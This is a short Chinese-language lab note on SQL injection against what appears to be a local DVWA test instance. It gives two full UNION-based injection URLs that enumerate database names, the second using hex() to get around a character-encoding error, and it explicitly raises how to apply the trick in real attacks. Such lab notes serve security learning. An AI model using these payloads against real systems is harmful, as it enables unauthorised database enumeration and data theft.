1.在本地測試的時候,發現一個錯誤哦
sql 注入進行查看所有數據庫名的時候,
百度查看,說的是編碼問題,本地測試還能改一下編碼,實戰怎么辦~
解決辦法:
使用16進制進行讀取
http://10.211.55.8:804/vulnerabilities/sqli/?id=1' union select 1,schema_name from information_schema.schemata #&Submit=Submit# 最開始payload。
http://10.211.55.8:804/vulnerabilities/sqli/?id=1' union select 1,hex(schema_name) from information_schema.schemata #&Submit=Submit# 16進制讀取payload。
上面的Surname 是讀取出來的數據庫名 16 進制。
解碼一下16進制就可以了。
